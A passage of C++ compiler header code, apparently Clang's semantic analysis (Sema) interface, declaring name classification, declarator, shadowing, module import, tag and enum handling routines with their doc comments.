IdentifierInfo **CorrectedII = nullptr);
TypeSpecifierType isTagName(IdentifierInfo &II, Scope *S);
bool isMicrosoftMissingTypename(const CXXScopeSpec *SS, Scope *S);
void DiagnoseUnknownTypeName(IdentifierInfo *&II,
SourceLocation IILoc,
Scope *S,
CXXScopeSpec *SS,
ParsedType &SuggestedType,
bool IsTemplateName = false);
/// Attempt to behave like MSVC in situations where lookup of an unqualified
/// type name has failed in a dependent context. In these situations, we
/// automatically form a DependentTypeName that will retry lookup in a related
/// scope during instantiation.
ParsedType ActOnMSVCUnknownTypeName(const IdentifierInfo &II,
SourceLocation NameLoc,
bool IsTemplateTypeArg);
/// Describes the result of the name lookup and resolution performed
/// by \c ClassifyName().
enum NameClassificationKind {
/// This name is not a type or template in this context, but might be
/// something else.
NC_Unknown,
/// Classification failed; an error has been produced.
NC_Error,
/// The name has been typo-corrected to a keyword.
NC_Keyword,
/// The name was classified as a type.
NC_Type,
/// The name was classified as a specific non-type, non-template
/// declaration. ActOnNameClassifiedAsNonType should be called to
/// convert the declaration to an expression.
NC_NonType,
/// The name was classified as an ADL-only function name.
/// ActOnNameClassifiedAsUndeclaredNonType should be called to convert the
/// result to an expression.
NC_UndeclaredNonType,
/// The name denotes a member of a dependent type that could not be
/// resolved. ActOnNameClassifiedAsDependentNonType should be called to
/// convert the result to an expression.
NC_DependentNonType,
/// The name was classified as a non-type, and an expression representing
/// that name has been formed.
NC_ContextIndependentExpr,
/// The name was classified as a template whose specializations are types.
NC_TypeTemplate,
/// The name was classified as a variable template name.
NC_VarTemplate,
/// The name was classified as a function template name.
NC_FunctionTemplate,
/// The name was classified as an ADL-only function template name.
NC_UndeclaredTemplate,
/// The name was classified as a concept name.
NC_Concept,
};
class NameClassification {
NameClassificationKind Kind;
union {
ExprResult Expr;
NamedDecl *NonTypeDecl;
TemplateName Template;
ParsedType Type;
};
explicit NameClassification(NameClassificationKind Kind) : Kind(Kind) {}
public:
NameClassification(ParsedType Type) : Kind(NC_Type), Type(Type) {}
NameClassification(const IdentifierInfo *Keyword) : Kind(NC_Keyword) {}
static NameClassification Error() {
return NameClassification(NC_Error);
}
static NameClassification Unknown() {
return NameClassification(NC_Unknown);
}
static NameClassification ContextIndependentExpr(ExprResult E) {
NameClassification Result(NC_ContextIndependentExpr);
Result.Expr = E;
return Result;
}
static NameClassification NonType(NamedDecl *D) {
NameClassification Result(NC_NonType);
Result.NonTypeDecl = D;
return Result;
}
static NameClassification UndeclaredNonType() {
return NameClassification(NC_UndeclaredNonType);
}
static NameClassification DependentNonType() {
return NameClassification(NC_DependentNonType);
}
static NameClassification TypeTemplate(TemplateName Name) {
NameClassification Result(NC_TypeTemplate);
Result.Template = Name;
return Result;
}
static NameClassification VarTemplate(TemplateName Name) {
NameClassification Result(NC_VarTemplate);
Result.Template = Name;
return Result;
}
static NameClassification FunctionTemplate(TemplateName Name) {
NameClassification Result(NC_FunctionTemplate);
Result.Template = Name;
return Result;
}
static NameClassification Concept(TemplateName Name) {
NameClassification Result(NC_Concept);
Result.Template = Name;
return Result;
}
static NameClassification UndeclaredTemplate(TemplateName Name) {
NameClassification Result(NC_UndeclaredTemplate);
Result.Template = Name;
return Result;
}
NameClassificationKind getKind() const { return Kind; }
ExprResult getExpression() const {
assert(Kind == NC_ContextIndependentExpr);
return Expr;
}
ParsedType getType() const {
assert(Kind == NC_Type);
return Type;
}
NamedDecl *getNonTypeDecl() const {
assert(Kind == NC_NonType);
return NonTypeDecl;
}
TemplateName getTemplateName() const {
assert(Kind == NC_TypeTemplate || Kind == NC_FunctionTemplate ||
Kind == NC_VarTemplate || Kind == NC_Concept ||
Kind == NC_UndeclaredTemplate);
return Template;
}
TemplateNameKind getTemplateNameKind() const {
switch (Kind) {
case NC_TypeTemplate:
return TNK_Type_template;
case NC_FunctionTemplate:
return TNK_Function_template;
case NC_VarTemplate:
return TNK_Var_template;
case NC_Concept:
return TNK_Concept_template;
case NC_UndeclaredTemplate:
return TNK_Undeclared_template;
default:
llvm_unreachable("unsupported name classification.");
}
}
};
/// Perform name lookup on the given name, classifying it based on
/// the results of name lookup and the following token.
///
/// This routine is used by the parser to resolve identifiers and help direct
/// parsing. When the identifier cannot be found, this routine will attempt
/// to correct the typo and classify based on the resulting name.
///
/// \param S The scope in which we're performing name lookup.
///
/// \param SS The nested-name-specifier that precedes the name.
///
/// \param Name The identifier. If typo correction finds an alternative name,
/// this pointer parameter will be updated accordingly.
///
/// \param NameLoc The location of the identifier.
///
/// \param NextToken The token following the identifier. Used to help
/// disambiguate the name.
///
/// \param CCC The correction callback, if typo correction is desired.
NameClassification ClassifyName(Scope *S, CXXScopeSpec &SS,
IdentifierInfo *&Name, SourceLocation NameLoc,
const Token &NextToken,
CorrectionCandidateCallback *CCC = nullptr);
/// Act on the result of classifying a name as an undeclared (ADL-only)
/// non-type declaration.
ExprResult ActOnNameClassifiedAsUndeclaredNonType(IdentifierInfo *Name,
SourceLocation NameLoc);
/// Act on the result of classifying a name as an undeclared member of a
/// dependent base class.
ExprResult ActOnNameClassifiedAsDependentNonType(const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsAddressOfOperand);
/// Act on the result of classifying a name as a specific non-type
/// declaration.
ExprResult ActOnNameClassifiedAsNonType(Scope *S, const CXXScopeSpec &SS,
NamedDecl *Found,
SourceLocation NameLoc,
const Token &NextToken);
/// Describes the detailed kind of a template name. Used in diagnostics.
enum class TemplateNameKindForDiagnostics {
ClassTemplate,
FunctionTemplate,
VarTemplate,
AliasTemplate,
TemplateTemplateParam,
Concept,
DependentTemplate
};
TemplateNameKindForDiagnostics
getTemplateNameKindForDiagnostics(TemplateName Name);
/// Determine whether it's plausible that E was intended to be a
/// template-name.
bool mightBeIntendedToBeTemplateName(ExprResult E, bool &Dependent) {
if (!getLangOpts().CPlusPlus || E.isInvalid())
return false;
Dependent = false;
if (auto *DRE = dyn_cast<DeclRefExpr>(E.get()))
return !DRE->hasExplicitTemplateArgs();
if (auto *ME = dyn_cast<MemberExpr>(E.get()))
return !ME->hasExplicitTemplateArgs();
Dependent = true;
if (auto *DSDRE = dyn_cast<DependentScopeDeclRefExpr>(E.get()))
return !DSDRE->hasExplicitTemplateArgs();
if (auto *DSME = dyn_cast<CXXDependentScopeMemberExpr>(E.get()))
return !DSME->hasExplicitTemplateArgs();
// Any additional cases recognized here should also be handled by
// diagnoseExprIntendedAsTemplateName.
return false;
}
void diagnoseExprIntendedAsTemplateName(Scope *S, ExprResult TemplateName,
SourceLocation Less,
SourceLocation Greater);
Decl *ActOnDeclarator(Scope *S, Declarator &D);
NamedDecl *HandleDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParameterLists);
void RegisterLocallyScopedExternCDecl(NamedDecl *ND, Scope *S);
bool DiagnoseClassNameShadow(DeclContext *DC, DeclarationNameInfo Info);
bool diagnoseQualifiedDeclaration(CXXScopeSpec &SS, DeclContext *DC,
DeclarationName Name, SourceLocation Loc,
bool IsTemplateId);
void
diagnoseIgnoredQualifiers(unsigned DiagID, unsigned Quals,
SourceLocation FallbackLoc,
SourceLocation ConstQualLoc = SourceLocation(),
SourceLocation VolatileQualLoc = SourceLocation(),
SourceLocation RestrictQualLoc = SourceLocation(),
SourceLocation AtomicQualLoc = SourceLocation(),
SourceLocation UnalignedQualLoc = SourceLocation());
void diagnosePointerAuthDisabled(SourceLocation loc, SourceRange range);
bool checkConstantPointerAuthKey(Expr *keyExpr, unsigned &key);
static bool adjustContextForLocalExternDecl(DeclContext *&DC);
void DiagnoseFunctionSpecifiers(const DeclSpec &DS);
NamedDecl *getShadowedDeclaration(const TypedefNameDecl *D,
const LookupResult &R);
NamedDecl *getShadowedDeclaration(const VarDecl *D, const LookupResult &R);
void CheckShadow(NamedDecl *D, NamedDecl *ShadowedDecl,
const LookupResult &R);
void CheckShadow(Scope *S, VarDecl *D);
/// Warn if 'E', which is an expression that is about to be modified, refers
/// to a shadowing declaration.
void CheckShadowingDeclModification(Expr *E, SourceLocation Loc);
void DiagnoseShadowingLambdaDecls(const sema::LambdaScopeInfo *LSI);
private:
/// Map of current shadowing declarations to shadowed declarations. Warn if
/// it looks like the user is trying to modify the shadowing declaration.
llvm::DenseMap<const NamedDecl *, const NamedDecl *> ShadowingDecls;
public:
void CheckCastAlign(Expr *Op, QualType T, SourceRange TRange);
void handleTagNumbering(const TagDecl *Tag, Scope *TagScope);
void setTagNameForLinkagePurposes(TagDecl *TagFromDeclSpec,
TypedefNameDecl *NewTD);
void CheckTypedefForVariablyModifiedType(Scope *S, TypedefNameDecl *D);
NamedDecl* ActOnTypedefDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous);
NamedDecl* ActOnTypedefNameDecl(Scope* S, DeclContext* DC, TypedefNameDecl *D,
LookupResult &Previous, bool &Redeclaration);
NamedDecl *ActOnVariableDeclarator(Scope *S, Declarator &D, DeclContext *DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope,
ArrayRef<BindingDecl *> Bindings = None);
NamedDecl *
ActOnDecompositionDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists);
// Returns true if the variable declaration is a redeclaration
bool CheckVariableDeclaration(VarDecl *NewVD, LookupResult &Previous);
void CheckVariableDeclarationType(VarDecl *NewVD);
bool DeduceVariableDeclarationType(VarDecl *VDecl, bool DirectInit,
Expr *Init);
void CheckCompleteVariableDeclaration(VarDecl *VD);
void CheckCompleteDecompositionDeclaration(DecompositionDecl *DD);
void MaybeSuggestAddingStaticToDecl(const FunctionDecl *D);
NamedDecl* ActOnFunctionDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope);
bool AddOverriddenMethods(CXXRecordDecl *DC, CXXMethodDecl *MD);
enum class CheckConstexprKind {
/// Diagnose issues that are non-constant or that are extensions.
Diagnose,
/// Identify whether this function satisfies the formal rules for constexpr
/// functions in the current language mode (with no extensions).
CheckValid
};
bool CheckConstexprFunctionDefinition(const FunctionDecl *FD,
CheckConstexprKind Kind);
void DiagnoseHiddenVirtualMethods(CXXMethodDecl *MD);
void FindHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
void NoteHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
// Returns true if the function declaration is a redeclaration
bool CheckFunctionDeclaration(Scope *S,
FunctionDecl *NewFD, LookupResult &Previous,
bool IsMemberSpecialization);
bool shouldLinkDependentDeclWithPrevious(Decl *D, Decl *OldDecl);
bool canFullyTypeCheckRedeclaration(ValueDecl *NewD, ValueDecl *OldD,
QualType NewT, QualType OldT);
void CheckMain(FunctionDecl *FD, const DeclSpec &D);
void CheckMSVCRTEntryPoint(FunctionDecl *FD);
Attr *getImplicitCodeSegOrSectionAttrForFunction(const FunctionDecl *FD,
bool IsDefinition);
void CheckFunctionOrTemplateParamDeclarator(Scope *S, Declarator &D);
Decl *ActOnParamDeclarator(Scope *S, Declarator &D);
ParmVarDecl *BuildParmVarDeclForTypedef(DeclContext *DC,
SourceLocation Loc,
QualType T);
QualType adjustParameterTypeForObjCAutoRefCount(QualType T,
SourceLocation NameLoc,
TypeSourceInfo *TSInfo);
ParmVarDecl *CheckParameter(DeclContext *DC, SourceLocation StartLoc,
SourceLocation NameLoc, IdentifierInfo *Name,
QualType T, TypeSourceInfo *TSInfo,
StorageClass SC);
void ActOnParamDefaultArgument(Decl *param,
SourceLocation EqualLoc,
Expr *defarg);
void ActOnParamUnparsedDefaultArgument(Decl *param,
SourceLocation EqualLoc,
SourceLocation ArgLoc);
void ActOnParamDefaultArgumentError(Decl *param, SourceLocation EqualLoc);
bool SetParamDefaultArgument(ParmVarDecl *Param, Expr *DefaultArg,
SourceLocation EqualLoc);
// Contexts where using non-trivial C union types can be disallowed. This is
// passed to err_non_trivial_c_union_in_invalid_context.
enum NonTrivialCUnionContext {
// Function parameter.
NTCUC_FunctionParam,
// Function return.
NTCUC_FunctionReturn,
// Default-initialized object.
NTCUC_DefaultInitializedObject,
// Variable with automatic storage duration.
NTCUC_AutoVar,
// Initializer expression that might copy from another object.
NTCUC_CopyInit,
// Assignment.
NTCUC_Assignment,
// Compound literal.
NTCUC_CompoundLiteral,
// Block capture.
NTCUC_BlockCapture,
// lvalue-to-rvalue conversion of volatile type.
NTCUC_LValueToRValueVolatile,
};
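// An illustrative source of non-triviality (C with Objective-C ARC): a union
// with a __strong member is non-trivial to initialize, copy, and destruct.
//
//   union U { id obj; int i; };  // 'id' is __strong under ARC
//   void f(union U u);           // checked with NTCUC_FunctionParam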
/// Emit diagnostics if the initializer or any of its explicit or
/// implicitly-generated subexpressions require copying or
/// default-initializing a type that is or contains a C union type that is
/// non-trivial to copy or default-initialize.
void checkNonTrivialCUnionInInitializer(const Expr *Init, SourceLocation Loc);
// These flags are passed to checkNonTrivialCUnion.
enum NonTrivialCUnionKind {
NTCUK_Init = 0x1,
NTCUK_Destruct = 0x2,
NTCUK_Copy = 0x4,
};
/// Emit diagnostics if a non-trivial C union type or a struct that contains
/// a non-trivial C union is used in an invalid context.
void checkNonTrivialCUnion(QualType QT, SourceLocation Loc,
NonTrivialCUnionContext UseContext,
unsigned NonTrivialKind);
void AddInitializerToDecl(Decl *dcl, Expr *init, bool DirectInit);
void ActOnUninitializedDecl(Decl *dcl);
void ActOnInitializerError(Decl *Dcl);
void ActOnPureSpecifier(Decl *D, SourceLocation PureSpecLoc);
void ActOnCXXForRangeDecl(Decl *D);
StmtResult ActOnCXXForRangeIdentifier(Scope *S, SourceLocation IdentLoc,
IdentifierInfo *Ident,
ParsedAttributes &Attrs,
SourceLocation AttrEnd);
void SetDeclDeleted(Decl *dcl, SourceLocation DelLoc);
void SetDeclDefaulted(Decl *dcl, SourceLocation DefaultLoc);
void CheckStaticLocalForDllExport(VarDecl *VD);
void FinalizeDeclaration(Decl *D);
DeclGroupPtrTy FinalizeDeclaratorGroup(Scope *S, const DeclSpec &DS,
ArrayRef<Decl *> Group);
DeclGroupPtrTy BuildDeclaratorGroup(MutableArrayRef<Decl *> Group);
/// Should be called on all declarations that might have attached
/// documentation comments.
void ActOnDocumentableDecl(Decl *D);
void ActOnDocumentableDecls(ArrayRef<Decl *> Group);
void ActOnFinishKNRParamDeclarations(Scope *S, Declarator &D,
SourceLocation LocAfterDecls);
void CheckForFunctionRedefinition(
FunctionDecl *FD, const FunctionDecl *EffectiveDefinition = nullptr,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Decl *D,
SkipBodyInfo *SkipBody = nullptr);
void ActOnStartTrailingRequiresClause(Scope *S, Declarator &D);
ExprResult ActOnFinishTrailingRequiresClause(ExprResult ConstraintExpr);
void ActOnStartOfObjCMethodDef(Scope *S, Decl *D);
bool isObjCMethodDecl(Decl *D) {
return D && isa<ObjCMethodDecl>(D);
}
/// Determine whether we can delay parsing the body of a function or
/// function template until it is used, assuming we don't care about emitting
/// code for that function.
///
/// This will be \c false if we may need the body of the function in the
/// middle of parsing an expression (where it's impractical to switch to
/// parsing a different function), for instance, if it's constexpr in C++11
/// or has an 'auto' return type in C++14. These cases are essentially bugs.
bool canDelayFunctionBody(const Declarator &D);
/// Determine whether we can skip parsing the body of a function
/// definition, assuming we don't care about analyzing its body or emitting
/// code for that function.
///
/// This will be \c false only if we may need the body of the function in
/// order to parse the rest of the program (for instance, if it is
/// \c constexpr in C++11 or has an 'auto' return type in C++14).
bool canSkipFunctionBody(Decl *D);
void computeNRVO(Stmt *Body, sema::FunctionScopeInfo *Scope);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body, bool IsInstantiation);
Decl *ActOnSkippedFunctionBody(Decl *Decl);
void ActOnFinishInlineFunctionDef(FunctionDecl *D);
/// ActOnFinishDelayedAttribute - Invoked when we have finished parsing an
/// attribute for which parsing is delayed.
void ActOnFinishDelayedAttribute(Scope *S, Decl *D, ParsedAttributes &Attrs);
/// Diagnose any unused parameters in the given sequence of
/// ParmVarDecl pointers.
void DiagnoseUnusedParameters(ArrayRef<ParmVarDecl *> Parameters);
/// Diagnose whether the size of parameters or return value of a
/// function or obj-c method definition is pass-by-value and larger than a
/// specified threshold.
void
DiagnoseSizeOfParametersAndReturnValue(ArrayRef<ParmVarDecl *> Parameters,
QualType ReturnTy, NamedDecl *D);
void DiagnoseInvalidJumps(Stmt *Body);
Decl *ActOnFileScopeAsmDecl(Expr *expr,
SourceLocation AsmLoc,
SourceLocation RParenLoc);
/// Handle a C++11 empty-declaration and attribute-declaration.
Decl *ActOnEmptyDeclaration(Scope *S, const ParsedAttributesView &AttrList,
SourceLocation SemiLoc);
enum class ModuleDeclKind {
Interface, ///< 'export module X;'
Implementation, ///< 'module X;'
};
/// The parser has processed a module-declaration that begins the definition
/// of a module interface or implementation.
DeclGroupPtrTy ActOnModuleDecl(SourceLocation StartLoc,
SourceLocation ModuleLoc, ModuleDeclKind MDK,
ModuleIdPath Path, bool IsFirstDecl);
/// The parser has processed a global-module-fragment declaration that begins
/// the definition of the global module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
DeclGroupPtrTy ActOnGlobalModuleFragmentDecl(SourceLocation ModuleLoc);
/// The parser has processed a private-module-fragment declaration that begins
/// the definition of the private module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
/// \param PrivateLoc The location of the 'private' keyword.
DeclGroupPtrTy ActOnPrivateModuleFragmentDecl(SourceLocation ModuleLoc,
SourceLocation PrivateLoc);
/// The parser has processed a module import declaration.
///
/// \param StartLoc The location of the first token in the declaration. This
/// could be the location of an '@', 'export', or 'import'.
/// \param ExportLoc The location of the 'export' keyword, if any.
/// \param ImportLoc The location of the 'import' keyword.
/// \param Path The module access path.
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, ModuleIdPath Path);
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, Module *M,
ModuleIdPath Path = {});
/// The parser has processed a module import translated from a
/// #include or similar preprocessing directive.
void ActOnModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
void BuildModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has entered a submodule.
void ActOnModuleBegin(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has left a submodule.
void ActOnModuleEnd(SourceLocation DirectiveLoc, Module *Mod);
/// Create an implicit import of the given module at the given
/// source location, for error recovery, if possible.
///
/// This routine is typically used when an entity found by name lookup
/// is actually hidden within a module that we know about but the user
/// has forgotten to import.
void createImplicitModuleImportForErrorRecovery(SourceLocation Loc,
Module *Mod);
/// Kinds of missing import. Note, the values of these enumerators correspond
/// to %select values in diagnostics.
enum class MissingImportKind {
Declaration,
Definition,
DefaultArgument,
ExplicitSpecialization,
PartialSpecialization
};
/// Diagnose that the specified declaration needs to be visible but
/// isn't, and suggest a module import that would resolve the problem.
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
MissingImportKind MIK, bool Recover = true);
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
SourceLocation DeclLoc, ArrayRef<Module *> Modules,
MissingImportKind MIK, bool Recover);
Decl *ActOnStartExportDecl(Scope *S, SourceLocation ExportLoc,
SourceLocation LBraceLoc);
Decl *ActOnFinishExportDecl(Scope *S, Decl *ExportDecl,
SourceLocation RBraceLoc);
/// We've found a use of a templated declaration that would trigger an
/// implicit instantiation. Check that any relevant explicit specializations
/// and partial specializations are visible, and diagnose if not.
void checkSpecializationVisibility(SourceLocation Loc, NamedDecl *Spec);
/// We've found a use of a template specialization that would select a
/// partial specialization. Check that the partial specialization is visible,
/// and diagnose if not.
void checkPartialSpecializationVisibility(SourceLocation Loc,
NamedDecl *Spec);
/// Retrieve a suitable printing policy for diagnostics.
PrintingPolicy getPrintingPolicy() const {
return getPrintingPolicy(Context, PP);
}
/// Retrieve a suitable printing policy for diagnostics.
static PrintingPolicy getPrintingPolicy(const ASTContext &Ctx,
const Preprocessor &PP);
/// Scope actions.
void ActOnPopScope(SourceLocation Loc, Scope *S);
void ActOnTranslationUnitScope(Scope *S);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
RecordDecl *&AnonRecord);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
MultiTemplateParamsArg TemplateParams,
bool IsExplicitInstantiation,
RecordDecl *&AnonRecord);
Decl *BuildAnonymousStructOrUnion(Scope *S, DeclSpec &DS,
AccessSpecifier AS,
RecordDecl *Record,
const PrintingPolicy &Policy);
Decl *BuildMicrosoftCAnonymousStruct(Scope *S, DeclSpec &DS,
RecordDecl *Record);
/// Common ways to introduce type names without a tag for use in diagnostics.
/// Keep in sync with err_tag_reference_non_tag.
enum NonTagKind {
NTK_NonStruct,
NTK_NonClass,
NTK_NonUnion,
NTK_NonEnum,
NTK_Typedef,
NTK_TypeAlias,
NTK_Template,
NTK_TypeAliasTemplate,
NTK_TemplateTemplateArgument,
};
/// Given a non-tag type declaration, returns an enum useful for indicating
/// what kind of non-tag type this is.
NonTagKind getNonTagTypeDeclKind(const Decl *D, TagTypeKind TTK);
bool isAcceptableTagRedeclaration(const TagDecl *Previous,
TagTypeKind NewTag, bool isDefinition,
SourceLocation NewTagLoc,
const IdentifierInfo *Name);
enum TagUseKind {
TUK_Reference, // Reference to a tag: 'struct foo *X;'
TUK_Declaration, // Fwd decl of a tag: 'struct foo;'
TUK_Definition, // Definition of a tag: 'struct foo { int X; } Y;'
TUK_Friend // Friend declaration: 'friend struct foo;'
};
Decl *ActOnTag(Scope *S, unsigned TagSpec, TagUseKind TUK,
SourceLocation KWLoc, CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc, const ParsedAttributesView &Attr,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
MultiTemplateParamsArg TemplateParameterLists, bool &OwnedDecl,
bool &IsDependent, SourceLocation ScopedEnumKWLoc,
bool ScopedEnumUsesClassTag, TypeResult UnderlyingType,
bool IsTypeSpecifier, bool IsTemplateParamOrArg,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnTemplatedFriendTag(Scope *S, SourceLocation FriendLoc,
unsigned TagSpec, SourceLocation TagLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TempParamLists);
TypeResult ActOnDependentTag(Scope *S,
unsigned TagSpec,
TagUseKind TUK,
const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation TagLoc,
SourceLocation NameLoc);
void ActOnDefs(Scope *S, Decl *TagD, SourceLocation DeclStart,
IdentifierInfo *ClassName,
SmallVectorImpl<Decl *> &Decls);
Decl *ActOnField(Scope *S, Decl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth);
FieldDecl *HandleField(Scope *S, RecordDecl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS);
MSPropertyDecl *HandleMSProperty(Scope *S, RecordDecl *TagD,
SourceLocation DeclStart, Declarator &D,
Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS,
const ParsedAttr &MSPropertyAttr);
FieldDecl *CheckFieldDecl(DeclarationName Name, QualType T,
TypeSourceInfo *TInfo,
RecordDecl *Record, SourceLocation Loc,
bool Mutable, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
SourceLocation TSSL,
AccessSpecifier AS, NamedDecl *PrevDecl,
Declarator *D = nullptr);
bool CheckNontrivialField(FieldDecl *FD);
void DiagnoseNontrivial(const CXXRecordDecl *Record, CXXSpecialMember CSM);
enum TrivialABIHandling {
/// The triviality of a method unaffected by "trivial_abi".
TAH_IgnoreTrivialABI,
/// The triviality of a method affected by "trivial_abi".
TAH_ConsiderTrivialABI
};
bool SpecialMemberIsTrivial(CXXMethodDecl *MD, CXXSpecialMember CSM,
TrivialABIHandling TAH = TAH_IgnoreTrivialABI,
bool Diagnose = false);
/// For a defaulted function, the kind of defaulted function that it is.
class DefaultedFunctionKind {
CXXSpecialMember SpecialMember : 8;
DefaultedComparisonKind Comparison : 8;
public:
DefaultedFunctionKind()
: SpecialMember(CXXInvalid), Comparison(DefaultedComparisonKind::None) {
}
DefaultedFunctionKind(CXXSpecialMember CSM)
: SpecialMember(CSM), Comparison(DefaultedComparisonKind::None) {}
DefaultedFunctionKind(DefaultedComparisonKind Comp)
: SpecialMember(CXXInvalid), Comparison(Comp) {}
bool isSpecialMember() const { return SpecialMember != CXXInvalid; }
bool isComparison() const {
return Comparison != DefaultedComparisonKind::None;
}
explicit operator bool() const {
return isSpecialMember() || isComparison();
}
CXXSpecialMember asSpecialMember() const { return SpecialMember; }
DefaultedComparisonKind asComparison() const { return Comparison; }
/// Get the index of this function kind for use in diagnostics.
unsigned getDiagnosticIndex() const {
static_assert(CXXInvalid > CXXDestructor,
"invalid should have highest index");
static_assert((unsigned)DefaultedComparisonKind::None == 0,
"none should be equal to zero");
return SpecialMember + (unsigned)Comparison;
}
};
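// For illustration, a minimal sketch of the two kinds this class
// distinguishes:
//
//   struct W {
//     W(const W &) = default;                     // special member:
//                                                 //   copy constructor
//     bool operator==(const W &) const = default; // defaulted comparison:
//                                                 //   equality (C++20)
//   };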
DefaultedFunctionKind getDefaultedFunctionKind(const FunctionDecl *FD);
CXXSpecialMember getSpecialMember(const CXXMethodDecl *MD) {
return getDefaultedFunctionKind(MD).asSpecialMember();
}
DefaultedComparisonKind getDefaultedComparisonKind(const FunctionDecl *FD) {
return getDefaultedFunctionKind(FD).asComparison();
}
void ActOnLastBitfield(SourceLocation DeclStart,
SmallVectorImpl<Decl *> &AllIvarDecls);
Decl *ActOnIvar(Scope *S, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
tok::ObjCKeywordKind visibility);
// This is used for both record definitions and ObjC interface declarations.
void ActOnFields(Scope *S, SourceLocation RecLoc, Decl *TagDecl,
ArrayRef<Decl *> Fields, SourceLocation LBrac,
SourceLocation RBrac, const ParsedAttributesView &AttrList);
/// ActOnTagStartDefinition - Invoked when we have entered the
/// scope of a tag's definition (e.g., for an enumeration, class,
/// struct, or union).
void ActOnTagStartDefinition(Scope *S, Decl *TagDecl);
/// Perform an ODR-like check for C/ObjC when merging tag types from modules.
/// Unlike C++, we actually parse the body and reject or error out in case of
/// a structural mismatch.
bool ActOnDuplicateDefinition(DeclSpec &DS, Decl *Prev,
SkipBodyInfo &SkipBody);
typedef void *SkippedDefinitionContext;
/// Invoked when we enter a tag definition that we're skipping.
SkippedDefinitionContext ActOnTagStartSkippedDefinition(Scope *S, Decl *TD);
Decl *ActOnObjCContainerStartDefinition(Decl *IDecl);
/// ActOnStartCXXMemberDeclarations - Invoked when we have parsed a
/// C++ record definition's base-specifiers clause and are starting its
/// member declarations.
void ActOnStartCXXMemberDeclarations(Scope *S, Decl *TagDecl,
SourceLocation FinalLoc,
bool IsFinalSpelledSealed,
SourceLocation LBraceLoc);
/// ActOnTagFinishDefinition - Invoked once we have finished parsing
/// the definition of a tag (enumeration, class, struct, or union).
void ActOnTagFinishDefinition(Scope *S, Decl *TagDecl,
SourceRange BraceRange);
void ActOnTagFinishSkippedDefinition(SkippedDefinitionContext Context);
void ActOnObjCContainerFinishDefinition();
/// Invoked when we must temporarily exit the objective-c container
/// scope for parsing/looking-up C constructs.
///
/// Must be followed by a call to \see ActOnObjCReenterContainerContext
void ActOnObjCTemporaryExitContainerContext(DeclContext *DC);
void ActOnObjCReenterContainerContext(DeclContext *DC);
/// ActOnTagDefinitionError - Invoked when there was an unrecoverable
/// error parsing the definition of a tag.
void ActOnTagDefinitionError(Scope *S, Decl *TagDecl);
EnumConstantDecl *CheckEnumConstant(EnumDecl *Enum,
EnumConstantDecl *LastEnumConst,
SourceLocation IdLoc,
IdentifierInfo *Id,
Expr *val);
bool CheckEnumUnderlyingType(TypeSourceInfo *TI);
bool CheckEnumRedeclaration(SourceLocation EnumLoc, bool IsScoped,
QualType EnumUnderlyingTy, bool IsFixed,
const EnumDecl *Prev);
/// Determine whether the body of an anonymous enumeration should be skipped.
/// \param II The name of the first enumerator.
SkipBodyInfo shouldSkipAnonEnumBody(Scope *S, IdentifierInfo *II,
SourceLocation IILoc);
Decl *ActOnEnumConstant(Scope *S, Decl *EnumDecl, Decl *LastEnumConstant,
SourceLocation IdLoc, IdentifierInfo *Id,
const ParsedAttributesView &Attrs,
SourceLocation EqualLoc, Expr *Val);
void ActOnEnumBody(SourceLocation EnumLoc, SourceRange BraceRange,
Decl *EnumDecl, ArrayRef<Decl *> Elements, Scope *S,
const ParsedAttributesView &Attr);
DeclContext *getContainingDC(DeclContext *DC);
/// Set the current declaration context until it gets popped.
void PushDeclContext(Scope *S, DeclContext *DC);
void PopDeclContext();
/// EnterDeclaratorContext - Used when we must lookup names in the context
/// of a declarator's nested name specifier.
void EnterDeclaratorContext(Scope *S, DeclContext *DC);
void ExitDeclaratorContext(Scope *S);
/// Push the parameters of D, which must be a function, into scope.
void ActOnReenterFunctionContext(Scope* S, Decl* D);
void ActOnExitFunctionContext();
